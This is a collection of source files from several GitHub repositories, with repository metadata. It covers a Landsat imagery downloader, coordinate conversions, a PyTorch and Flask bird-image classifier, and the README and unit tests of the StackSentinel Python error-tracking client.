"text": "#!/bin/env python3\n\nimport os\nimport sys\nimport time\nimport pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser(description='Generate list of scenes matching certain criterion.')\nparser.add_argument('scenes', type=str, help='path to scene list')\nparser.add_argument('--output', type=str, default='data/scenes', help='directory to output to')\nparser.add_argument('--wait', type=int, default=1, help='delay between file requests')\nparser.add_argument('--dryrun', action='store_true', help='just print out commands to run')\nparser.add_argument('--overwrite', action='store_true', help='always overwrite files')\nargs = parser.parse_args()\n\nfname_fmt = '{prod}_{chan}.{ext}'\nurl_fmt = 'gs://gcp-public-data-landsat/LE07/01/{path:03d}/{row:03d}/{prod}/{prod}_{chan}.{ext}'\n\nfetch_list = []\nfor i, targ in pd.read_csv(args.scenes).dropna().iterrows():\n scene, prod = targ['SCENE_ID'], targ['PRODUCT_ID']\n path, row = targ['WRS_PATH'], targ['WRS_ROW']\n\n fname = fname_fmt.format(prod=prod, chan='B8', ext='TIF')\n fpath = os.path.join(args.output, fname)\n if args.overwrite or not os.path.isfile(fpath):\n url = url_fmt.format(prod=prod, path=path, row=row, chan='B8', ext='TIF')\n fetch_list.append((prod, fpath, url))\n\n fname = fname_fmt.format(prod=prod, chan='MTL', ext='txt')\n fpath = os.path.join(args.output, fname)\n if args.overwrite or not os.path.isfile(fpath):\n url = url_fmt.format(prod=prod, path=path, row=row, chan='MTL', ext='txt')\n fetch_list.append((prod, fpath, url))\n\nfor prod, fpath, url in sorted(fetch_list, key=lambda x: x[0]):\n print(f'Fetching {prod}: {url} -> {fpath}')\n cmd = f'gsutil cp {url} {fpath}'\n if args.dryrun:\n print(cmd)\n else:\n os.system(cmd)\n print()\n time.sleep(args.wait)\n\nif args.dryrun:\n print(len(fetch_list))\n"
},
{
"alpha_fraction": 0.43938618898391724,
"alphanum_fraction": 0.5332480669021606,
"avg_line_length": 32.7068977355957,
"blob_id": "c31837ca865c2a770a167c03869eda1ef526f1e2",
"content_id": "1827280f3d6752d6b3b910e0980aab7295b29652",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3910,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 116,
"path": "/code/coord_transform.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom math import sin, cos, sqrt, fabs, atan2\nfrom math import pi as pi\n\n# define ellipsoid\na = 6378245.0\nf = 1 / 298.3\nb = a * (1 - f)\nee = 1 - (b * b) / (a * a)\n\ndef outOfChina(lng, lat):\n return not (72.004 <= lng <= 137.8347 and 0.8293 <= lat <= 55.8271)\n\ndef transformLat(x, y):\n ret = -100.0 + 2.0 * x + 3.0 * y + 0.2 * y * y + 0.1 * x * y + 0.2 * sqrt(fabs(x))\n ret = ret + (20.0 * sin(6.0 * x * pi) + 20.0 * sin(2.0 * x * pi)) * 2.0 / 3.0\n ret = ret + (20.0 * sin(y * pi) + 40.0 * sin(y / 3.0 * pi)) * 2.0 / 3.0\n ret = ret + (160.0 * sin(y / 12.0 * pi) + 320.0 * sin(y * pi / 30.0)) * 2.0 / 3.0\n return ret\n\ndef transformLon(x, y):\n ret = 300.0 + x + 2.0 * y + 0.1 * x * x + 0.1 * x * y + 0.1 * sqrt(fabs(x))\n ret = ret + (20.0 * sin(6.0 * x * pi) + 20.0 * sin(2.0 * x * pi)) * 2.0 / 3.0\n ret = ret + (20.0 * sin(x * pi) + 40.0 * sin(x / 3.0 * pi)) * 2.0 / 3.0\n ret = ret + (150.0 * sin(x / 12.0 * pi) + 300.0 * sin(x * pi / 30.0)) * 2.0 / 3.0\n return ret\n\ndef wgs2gcj(wgsLon, wgsLat):\n if outOfChina(wgsLon, wgsLat):\n return wgsLon, wgsLat\n dLat = transformLat(wgsLon - 105.0, wgsLat - 35.0)\n dLon = transformLon(wgsLon - 105.0, wgsLat - 35.0)\n radLat = wgsLat / 180.0 * pi\n magic = sin(radLat)\n magic = 1 - ee * magic * magic\n sqrtMagic = sqrt(magic)\n dLat = (dLat * 180.0) / ((a * (1 - ee)) / (magic * sqrtMagic) * pi)\n dLon = (dLon * 180.0) / (a / sqrtMagic * cos(radLat) * pi)\n gcjLat = wgsLat + dLat\n gcjLon = wgsLon + dLon\n return gcjLon, gcjLat\n\ndef gcj2wgs(gcjLon, gcjLat):\n g0 = gcjLon, gcjLat\n w0 = g0\n g1 = wgs2gcj(w0[0], w0[1])\n # w1 = w0 - (g1 - g0)\n w1 = tuple(map(lambda x: x[0]-(x[1]-x[2]), zip(w0,g1,g0)))\n # delta = w1 - w0\n delta = tuple(map(lambda x: x[0] - x[1], zip(w1, w0)))\n while (abs(delta[0]) >= 1e-6 or abs(delta[1]) >= 1e-6):\n w0 = w1\n g1 = wgs2gcj(w0[0], w0[1])\n # w1 = w0 - (g1 - g0)\n w1 = tuple(map(lambda x: x[0]-(x[1]-x[2]), zip(w0,g1,g0)))\n # delta = w1 - w0\n delta = tuple(map(lambda x: x[0] - x[1], zip(w1, w0)))\n return w1\n\ndef gcj2bd(gcjLon, gcjLat):\n z = sqrt(gcjLon * gcjLon + gcjLat * gcjLat) + 0.00002 * sin(gcjLat * pi * 3000.0 / 180.0)\n theta = atan2(gcjLat, gcjLon) + 0.000003 * cos(gcjLon * pi * 3000.0 / 180.0)\n bdLon = z * cos(theta) + 0.0065\n bdLat = z * sin(theta) + 0.006\n return bdLon, bdLat\n\ndef bd2gcj(bdLon, bdLat):\n x = bdLon - 0.0065\n y = bdLat - 0.006\n z = sqrt(x * x + y * y) - 0.00002 * sin(y * pi * 3000.0 / 180.0)\n theta = atan2(y, x) - 0.000003 * cos(x * pi * 3000.0 / 180.0)\n gcjLon = z * cos(theta)\n gcjLat = z * sin(theta)\n return gcjLon, gcjLat\n\ndef wgs2bd(wgsLon, wgsLat):\n gcj = wgs2gcj(wgsLon, wgsLat)\n return gcj2bd(gcj[0], gcj[1])\n\ndef bd2wgs(bdLon, bdLat):\n gcj = bd2gcj(bdLon, bdLat)\n return gcj2wgs(gcj[0], gcj[1])\n\n##\n## UTM conversions\n##\n\nrows = 'CDEFGHJKLMNPQRSTUVWX'\nzones = [z for z in range(1, 60+1)]\nfrow = {i: c for i, c in enumerate(rows)}\nrrow = {c: i for i, c in enumerate(rows)}\n\ndef wgs2utm(lon_wgs, lat_wgs):\n idx_lon = int(round(lon_wgs/6.0 + 30.5))\n idx_lat = int(round(lat_wgs/8.0 + 9.5))\n utm_lon = ((idx_lon-1) % 60) + 1\n utm_lat = frow[idx_lat]\n return f'{utm_lon}{utm_lat}'\n\ndef utm_center_wgs(lon_utm, lat_utm):\n idx_lon = lon_utm - 1\n idx_lat = rrow[lat_utm]\n lon_wgs = 6*(idx_lon - 30) + 3\n lat_wgs = 8*(idx_lat - 10) + 4\n return lon_wgs, lat_wgs\n\ndef gen_utm_centers():\n for z, r in product(zones, rows):\n utm = f'{z}{r}'\n proj = Proj(f'+proj=utm +zone={utm}, +ellps=WGS84 +datum=WGS84 +units=m +no_defs')\n lon, lat = utm_center_wgs(z, r)\n east, north = proj(lon, lat)\n yield utm, lon, lat, east, north\n\ndef utm_centers():\n return pd.DataFrame(gen_utm_centers(), columns=['utm', 'lon', 'lat', 'east', 'north'])\n"
}
] | 17 |
NomanTrips/bird-classifier | https://github.com/NomanTrips/bird-classifier | 2fd1da60c58bceaf3c1a1ea093755f5df37691e8 | 5a03a52d9311a8fe72a43bc48b21afe201f481f9 | 7141c248bd66423758f8b4345e17f07ce7357614 | refs/heads/main | 2023-02-03T09:26:35.120580 | 2020-12-23T16:00:06 | 2020-12-23T16:00:06 | 316,287,410 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6320346593856812,
"alphanum_fraction": 0.6320346593856812,
"avg_line_length": 32.07143020629883,
"blob_id": "69e0f938a8be23524b345d0e9efeeaa245bf57f2",
"content_id": "2faa84c6cfab618bffbd10aa4bcabb2b7fc7c6e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 14,
"path": "/python_code/api.py",
"repo_name": "NomanTrips/bird-classifier",
"src_encoding": "UTF-8",
"text": "from flask import Flask, jsonify\nfrom flask import request\napp = Flask(__name__)\n\n\[email protected]('/predict', methods=['POST'])\ndef predict():\n if request.method == 'POST':\n # we will get the file from the request\n file = request.files['file']\n # convert that to bytes\n img_bytes = file.read()\n class_id, class_name = get_prediction(image_bytes=img_bytes)\n return jsonify({'class_id': class_id, 'class_name': class_name})"
},
{
"alpha_fraction": 0.604087233543396,
"alphanum_fraction": 0.6286411285400391,
"avg_line_length": 33.87765884399414,
"blob_id": "ad1704be8f07f222684bd0b2a21f02932121c9fa",
"content_id": "7ae0d0b9dd5f633110aa3d22ca3f47b7fda9fd22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6557,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 188,
"path": "/python_code/model.py",
"repo_name": "NomanTrips/bird-classifier",
"src_encoding": "UTF-8",
"text": "import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\n# Specify transforms using torchvision.transforms as transforms\ntransformations = transforms.Compose([\n transforms.Resize(150),\n transforms.CenterCrop(150),\n transforms.ToTensor(),\n transforms.Normalize(mean=[.5, .5, .5], std=[.225, .225, .225])\n #transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\n# Load in each dataset and apply transformations using\n# the torchvision datasets as datasets library\n\ntrain_set = datasets.ImageFolder(\"data/train/\", transform = transformations)\ntest_set = datasets.ImageFolder(\"data/test/\", transform = transformations)\ntrain_loader = torch.utils.data.DataLoader(train_set, batch_size=4, shuffle=True)\n#train_loader = torch.utils.data.DataLoader(train_set, batch_size=len(train_set))\ntest_loader = torch.utils.data.DataLoader(test_set, batch_size =4, shuffle=True)\n\nclasses = [0,1]\n\n# functions to show an image\ndef imshow(img):\n img = img.cpu()\n #img = img / 2 + 0.5 # unnormalize ((image * std) + mean)\n img = ((img * .225) + .5) # unnormalize ((image * std) + mean)\n npimg = img.numpy()\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\n plt.show()\n\n# get some random training images\ndataiter = iter(train_loader)\nimages, labels = dataiter.next()\nimages = images.to(device)\nlabels = labels.to(device)\n\n# print labels\nprint(labels)\n#print(' '.join('%5s' % classes[labels[j]] for j in range(4)))\n# show images\nimshow(torchvision.utils.make_grid(images))\n\nclass Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n # 1 input image channel, 6 output channels, 3x3 square convolution\n # kernel\n self.conv1 = nn.Conv2d(3, 24, 11)\n self.conv2 = nn.Conv2d(24, 16, 5)\n # an affine operation: y = Wx + b\n self.fc1 = nn.Linear(17424, 5808) # 6*6 from image dimension\n self.fc2 = nn.Linear(5808, 1024)\n self.fc3 = nn.Linear(1024, 1)\n\n def forward(self, x):\n # Max pooling over a (2, 2) window\n x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))\n # If the size is a square you can only specify a single number\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\n x = x.view(-1, self.num_flat_features(x))\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n x = torch.sigmoid(x)\n return x\n\n def num_flat_features(self, x):\n size = x.size()[1:] # all dimensions except the batch dimension\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\nnet = Net()\nnet.to(device)\n#print(net)\n\ncriterion = nn.BCELoss()#nn.CrossEntropyLoss()\n#criterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)\nlosses = []\nminibatch_size = 4\nm = len(train_set)\n\n# Print model's state_dict\n#print(\"Model's state_dict:\")\n#for param_tensor in net.state_dict():\n# print(param_tensor, \"\\t\", net.state_dict()[param_tensor].size())\n\n# Print optimizer's state_dict\n#print(\"Optimizer's state_dict:\")\n#for var_name in optimizer.state_dict():\n# print(var_name, \"\\t\", optimizer.state_dict()[var_name])\n\ndef train_net():\n for epoch in range(30): # loop over the dataset multiple times\n minibatch_cost = 0.\n num_minibatches = int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set\n running_loss = 0.0\n for i, data in enumerate(train_loader, 0):\n # get the inputs; data is a list of [inputs, labels]\n inputs, labels = data\n inputs = inputs.to(device)\n labels = labels.to(device)\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n outputs = net(inputs).squeeze(1)\n #print(outputs)\n #print(labels.float())\n loss = criterion(outputs, labels.float()) # labels\n loss.backward()\n minibatch_cost += loss.item() / num_minibatches\n optimizer.step()\n\n if epoch % 5 == 0:\n print (\"Cost after epoch %i: %f\" % (epoch, minibatch_cost))\n if epoch % 1 == 0:\n losses.append(minibatch_cost)\n print('Finished Training')\n # plot the cost\n plt.plot(np.squeeze(losses))\n plt.ylabel('loss')\n plt.xlabel('iterations (per tens)')\n plt.title(\"placeholder\")\n #plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n\ndef predict(data_loader):\n correct = 0\n total = 0\n for i, data in enumerate(data_loader, 0):\n images, labels = data\n images = images.to(device)\n labels = labels.to(device)\n outputs = net(images)\n predicted = outputs.detach().cpu().numpy().squeeze(1) # put the output predictions in a 1D numpy array\n labels_np = labels.detach().cpu().numpy()\n probability = 0\n for i, x in enumerate(predicted): # convert the sigmoid output to a 0 or 1 prediction\n if x > .5:\n probability = 1\n else:\n probability = 0\n total += 1\n correct += (probability == labels_np[i])\n percent_correct = 100 * correct / total\n print('Accuracy of the network on the %d images: %d %%' %(total, percent_correct))\n\ndef show_predictions(data_loader):\n dataiter = iter(data_loader)\n images, labels = dataiter.next()\n images = images.to(device)\n labels = labels.to(device)\n imshow(torchvision.utils.make_grid(images))\n print('GroundTruth: ', ' '.join('%5s' % labels[j].detach().cpu().numpy() for j in range(minibatch_size)))\n outputs = net(images)\n predicted = outputs.detach().cpu().numpy().squeeze(1) # put the output predictions in a 1D numpy array\n probas = np.array([])\n for i, x in enumerate(predicted): # convert the sigmoid output to a 0 or 1 prediction\n if x > .5:\n probas = np.append(probas, 1)\n else:\n probas = np.append(probas, 0)\n print('Predicted: ', ' '.join('%5s' % int(probas[j]) for j in range(minibatch_size)))\n\ntrain_net()\npredict(train_loader)\npredict(test_loader)\nshow_predictions(test_loader)\n\ntorch.save(net.state_dict(), 'model.pt')\n"
},
{
"alpha_fraction": 0.6671949028968811,
"alphanum_fraction": 0.6946645379066467,
"avg_line_length": 29.063491821289062,
"blob_id": "cce2de204124585623b5089894857a88855f7e6c",
"content_id": "b3ffa73384a1b32f7d65c40b59c1bc6b6f9a7304",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1893,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 63,
"path": "/python_code/app_multiclass.py",
"repo_name": "NomanTrips/bird-classifier",
"src_encoding": "UTF-8",
"text": "import io\nimport json\n\nfrom torchvision import models\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\n#from model import Net\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\n\napp = Flask(__name__)\nCORS(app)\n\nclass_names = ['american-kestrel', 'bald-eagle', 'barred-owl', 'coopers-hawk', 'crow', 'great-horned-owl', 'non-hawk', 'northern-goshawk', 'osprey', 'peregrine-falcon', 'red-tailed-hawk', 'vulture']\n\n#model = models.resnet18(pretrained=True)\n#num_ftrs = model.fc.in_features\n#model.fc = nn.Linear(num_ftrs, 10)\nmodel = models.vgg16(pretrained=True)\nmodel.classifier[-1] = nn.Linear(in_features=4096, out_features=len(class_names))\nmodel.load_state_dict(torch.load('./vgg16_added_birds.pt', map_location=torch.device('cpu')))\nmodel.eval()\n\n#print(model)\n\ndef transform_image(image_bytes):\n my_transforms = transforms.Compose([\n transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])\n image = Image.open(io.BytesIO(image_bytes))\n return my_transforms(image).unsqueeze(0)\n\n\ndef get_prediction(image_bytes):\n tensor = transform_image(image_bytes=image_bytes)\n outputs = model.forward(tensor)\n _, predicted = torch.max(outputs, 1)\n m = nn.Softmax(dim=1)\n input = torch.randn(2, 3)\n output = m(outputs)\n predicted_class = class_names[predicted]\n return predicted_class\n\n\[email protected]('/predict', methods=['POST'])\ndef predict():\n if request.method == 'POST':\n file = request.files['file']\n img_bytes = file.read()\n predicted_class = get_prediction(image_bytes=img_bytes)\n return jsonify({'class': predicted_class})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')"
},
{
"alpha_fraction": 0.542958676815033,
"alphanum_fraction": 0.5768733620643616,
"avg_line_length": 29.663366317749023,
"blob_id": "776d251dbfc97169cdcef6321e5434815c710afe",
"content_id": "3c7f54fcc30ec2d38756b2bcb88e2468a091bdec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3096,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 101,
"path": "/python_code/app.py",
"repo_name": "NomanTrips/bird-classifier",
"src_encoding": "UTF-8",
"text": "import io\nimport json\n\nfrom torchvision import models\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\n#from model import Net\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nclass Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n # 1 input image channel, 6 output channels, 3x3 square convolution\n # kernel\n self.conv1 = nn.Conv2d(3, 24, 11)\n self.conv2 = nn.Conv2d(24, 16, 5)\n # an affine operation: y = Wx + b\n self.fc1 = nn.Linear(17424, 5808) # 6*6 from image dimension\n self.fc2 = nn.Linear(5808, 1024)\n self.fc3 = nn.Linear(1024, 1)\n\n def forward(self, x):\n # Max pooling over a (2, 2) window\n x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))\n # If the size is a square you can only specify a single number\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\n x = x.view(-1, self.num_flat_features(x))\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n x = torch.sigmoid(x)\n return x\n\n def num_flat_features(self, x):\n size = x.size()[1:] # all dimensions except the batch dimension\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n\napp = Flask(__name__)\nCORS(app)\nimagenet_class_index = json.load(open('./imagenet_class_index.json'))\n#model = models.densenet121(pretrained=True)\nmodel = Net()\n#model = torch.load('./model.pt')\nmodel.load_state_dict(torch.load('./model.pt'))\nmodel.eval()\n\n\n\ndef transform_image(image_bytes):\n my_transforms = transforms.Compose([transforms.Resize(150),\n transforms.CenterCrop(150),\n transforms.ToTensor(),\n transforms.Normalize(\n [0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n image = Image.open(io.BytesIO(image_bytes))\n return my_transforms(image).unsqueeze(0)\n\n\ndef get_prediction(image_bytes):\n tensor = transform_image(image_bytes=image_bytes)\n outputs = model.forward(tensor)\n predicted = outputs.detach().cpu().numpy().squeeze(1)\n probability = 0\n for i, x in enumerate(predicted): # convert the sigmoid output to a 0 or 1 prediction\n if x > .5:\n probability = 1\n else:\n probability = 0\n print(probability)\n #_, y_hat = outputs.max(1)\n #predicted_idx = str(y_hat.item())\n #print(predicted_idx)\n if probability == 1:\n class_id = 1\n else:\n class_id = 0\n return class_id\n\n\[email protected]('/predict', methods=['POST'])\ndef predict():\n if request.method == 'POST':\n file = request.files['file']\n img_bytes = file.read()\n class_id = get_prediction(image_bytes=img_bytes)\n return jsonify({'class_id': class_id})\n\n\nif __name__ == '__main__':\n app.run()"
},
{
"alpha_fraction": 0.4967532455921173,
"alphanum_fraction": 0.5844155550003052,
"avg_line_length": 43.14285659790039,
"blob_id": "c8dc770379b11f87ca4fee8effd97a85f2918f15",
"content_id": "5df4543a94fe62cc8322ec6afb8b8c60d3369da6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 7,
"path": "/python_code/sample_request.py",
"repo_name": "NomanTrips/bird-classifier",
"src_encoding": "UTF-8",
"text": "import requests\n\n#resp = requests.post(\"http://localhost:5000/predict\",\n# files={\"file\": open('../src/assets/hawk-three.jpg','rb')})\nresp = requests.post(\"http://52.37.86.143:5000/predict\",\n files={\"file\": open('../src/assets/00000018.jpg','rb')})\nprint(resp.json())"
},
{
"alpha_fraction": 0.6420249342918396,
"alphanum_fraction": 0.6595017910003662,
"avg_line_length": 33.811187744140625,
"blob_id": "98a68809749eb4559bb06931d6e56093090af83c",
"content_id": "7261f216c91e3d7101e8ee8287533b01d0ddc3f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4978,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 143,
"path": "/python_code/pretrained_model.py",
"repo_name": "NomanTrips/bird-classifier",
"src_encoding": "UTF-8",
"text": "import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\n# Specify transforms using torchvision.transforms as transforms\ntransformations = transforms.Compose([\n transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])\n\n# Load in each dataset and apply transformations using\n# the torchvision datasets as datasets library\n\ntrain_set = datasets.ImageFolder(\"hawk_data/train/\", transform = transformations)\ntest_set = datasets.ImageFolder(\"hawk_data/test/\", transform = transformations)\ntrain_loader = torch.utils.data.DataLoader(train_set, batch_size=4, shuffle=True)\n#train_loader = torch.utils.data.DataLoader(train_set, batch_size=len(train_set))\ntest_loader = torch.utils.data.DataLoader(test_set, batch_size =4, shuffle=True)\n\nclass_names = train_set.classes\nprint(class_names)\n\n# functions to show an image\ndef imshow(img):\n img = img.cpu()\n #img = img / 2 + 0.5 # unnormalize ((image * std) + mean)\n img = ((img * .225) + .5) # unnormalize ((image * std) + mean)\n npimg = img.numpy()\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\n plt.show()\n\n# get some random training images\nfor x in range(1):\n dataiter = iter(train_loader)\n images, labels = dataiter.next()\n images = images.to(device)\n labels = labels.to(device)\n\n # print labels\n print(labels)\n # show images\n imshow(torchvision.utils.make_grid(images))\n\ncriterion = nn.CrossEntropyLoss()\nlosses = []\nminibatch_size = 4\nm = len(train_set)\n\n#model_ft = models.resnet18(pretrained=True)\nmodel_ft = models.vgg16(pretrained=True)\n#num_ftrs = model_ft.fc.in_features\n# Here the size of each output sample is set to 2.\n# # Alternatively, it can be generalized to nn.Linear(num_ftrs, len(class_names)).\n#model_ft.fc = nn.Linear(num_ftrs, 10)\nmodel_ft.classifier[-1] = nn.Linear(in_features=4096, out_features=len(class_names))\nmodel_ft = model_ft.to(device)\n\n\n# Observe that all parameters are being optimized\noptimizer = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9)\n\ndef train_net():\n model_ft.train()\n for epoch in range(30): # loop over the dataset multiple times\n minibatch_cost = 0.\n num_minibatches = int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set\n running_loss = 0.0\n for i, data in enumerate(train_loader, 0):\n # get the inputs; data is a list of [inputs, labels]\n inputs, labels = data\n inputs = inputs.to(device)\n labels = labels.to(device)\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n outputs = model_ft(inputs)\n _, preds = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n loss.backward()\n minibatch_cost += loss.item() / num_minibatches\n optimizer.step()\n\n if epoch % 5 == 0:\n print (\"Cost after epoch %i: %f\" % (epoch, minibatch_cost))\n if epoch % 1 == 0:\n losses.append(minibatch_cost)\n print('Finished Training')\n # plot the cost\n plt.plot(np.squeeze(losses))\n plt.ylabel('loss')\n plt.xlabel('iterations (per tens)')\n plt.title(\"placeholder\")\n #plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n\ndef predict(data_loader):\n correct = 0\n total = 0\n for i, data in enumerate(data_loader, 0):\n images, labels = data\n images = images.to(device)\n labels = labels.to(device)\n labels_np = labels.detach().cpu().numpy()\n outputs = model_ft(images)\n _, preds = torch.max(outputs, 1)\n for i, x in enumerate(preds):\n total += 1\n correct += (class_names[preds[i]] == class_names[labels_np[i]])\n percent_correct = 100 * correct / total\n print('Accuracy of the network on the %d images: %d %%' %(total, percent_correct))\n\ndef show_predictions(data_loader):\n dataiter = iter(data_loader)\n images, labels = dataiter.next()\n images = images.to(device)\n labels = labels.to(device)\n labels_np = labels.detach().cpu().numpy()\n imshow(torchvision.utils.make_grid(images))\n print('GroundTruth: ', ' '.join('%5s' % class_names[labels_np[j]] for j in range(minibatch_size)))\n outputs = model_ft(images)\n _, preds = torch.max(outputs, 1)\n print('Predicted: ', ' '.join('%5s' % class_names[preds[j]] for j in range(minibatch_size)))\n\ntrain_net()\npredict(train_loader)\npredict(test_loader)\nshow_predictions(test_loader)\n\ntorch.save(model_ft.state_dict(), 'vgg16_added_birds.pt')\n"
}
] | 6 |
StackSentinel/stacksentinel-python | https://github.com/StackSentinel/stacksentinel-python | a8fca5165273f6b5dfa9248e833e84f5b174388a | 253664ac5ccaeb312f4288580e10061dac65403c | 2585e7dcf09265918375ca8b98bd4859a8bc8693 | refs/heads/master | 2021-01-22T06:59:10.659274 | 2015-09-25T17:44:53 | 2015-09-25T17:44:53 | 42,614,011 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6996073126792908,
"alphanum_fraction": 0.713350772857666,
"avg_line_length": 27.27777862548828,
"blob_id": "14f29349685abdf00a0a2d8ad39fbf47f738c66a",
"content_id": "b47674e4fe7f56d4566929d81f2a7ebc39029f21",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1528,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 54,
"path": "/README.md",
"repo_name": "StackSentinel/stacksentinel-python",
"src_encoding": "UTF-8",
"text": "# StackSentinel Python Client\n\nWelcome to the Stack Sentinel Python client, which makes it super-duper easy to integrate\n[Stack Sentinel](https://www.stacksentinel.com/) exception tracking into your Python project.\n\nTo get started tracking errors,\n\n1. Create an account on StackSentinel.com\n2. Create a new project\n3. Get your PROJECT and API tokens\n4. Add StackSentinel to your WSGI Middleware, or use it directly.\n\n## Installation\nstacksentinel is in pypi:\n\n # easy_install stacksentinel\n \nor\n\n # pip install stacksentinel\n\n## Directly use the client\n\nHere's how to get started:\n\n >>> import StackSentinel\n >>> stack_sentinel_client = StackSentinel.StackSentinelClient(\n ... account_token='-- YOUR ACCOUNT TOKEN --',\n ... project_token='-- YOUR PROJECT TOKEN --',\n ... environment='development-experiment', tags=['documentation-test'])\n >>> print stack_sentinel_client\n <StackSentinel.StackSentinelClient object at 0x10bcfbb90>\n >>> try:\n ... oops = 1 / 0\n ... except:\n ... stack_sentinel_client.handle_exception()\n ...\n \nThen you can use the WSGI Middleware:\n \n >>> app = StackSentinelMiddleware(app, stack_sentinel_client)\n\n# Compatibility\nThis StackSentinel Python Client is compatible with Python 2.7 and 3.x and Stack Sentinel API v1.\n\n# License\nCopyright 2015 Stack Sentinel. All Rights Reserved.\n\nThis software is licensed under the Apache License, version 2.0.\n\nSee LICENSE for full details.\n\n# Getting Help\nEmail [email protected] with your questions. \n"
},
{
"alpha_fraction": 0.5947955250740051,
"alphanum_fraction": 0.5971189737319946,
"avg_line_length": 30.647058486938477,
"blob_id": "c0c07caaa5b4732f414084c28a797c887329dae8",
"content_id": "4cb2001c860dcb7840611b1638871313b6d805a9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2152,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 68,
"path": "/tests/test_client.py",
"repo_name": "StackSentinel/stacksentinel-python",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTests for Stack Sentinel client.\n\"\"\"\nimport json\nfrom StackSentinel import StackSentinelMiddleware, StackSentinelClient, StackSentinelError\n\nimport unittest\nimport sys\n\nclass TestStackSentinel(unittest.TestCase):\n def setUp(self):\n pass\n\n def test_serialize_object(self):\n class RegularClass(object):\n pass\n\n class ObjectThatCantBeRepr(object):\n def __repr__(self):\n raise RuntimeError\n\n x = RegularClass()\n y = StackSentinelClient._serialize_object(x)\n if not (y.startswith('<') and 'RegularClass' in y):\n self.fail('Unexpected result from _serialize_object: %r' % y)\n\n x = ObjectThatCantBeRepr()\n y = StackSentinelClient._serialize_object(x)\n self.failUnlessEqual(y, '<Cannot Be Serialized>')\n\n def test_get_sys(self):\n client = StackSentinelClient('', '', 'unittest')\n sys_info = client._get_sys_info()\n self.failUnlessEqual(sys.path, sys_info['path'])\n\n def test_get_machine_info(self):\n client = StackSentinelClient('', '', 'unittest')\n machine_info = client._get_machine_info()\n self.failUnless('hostname' in 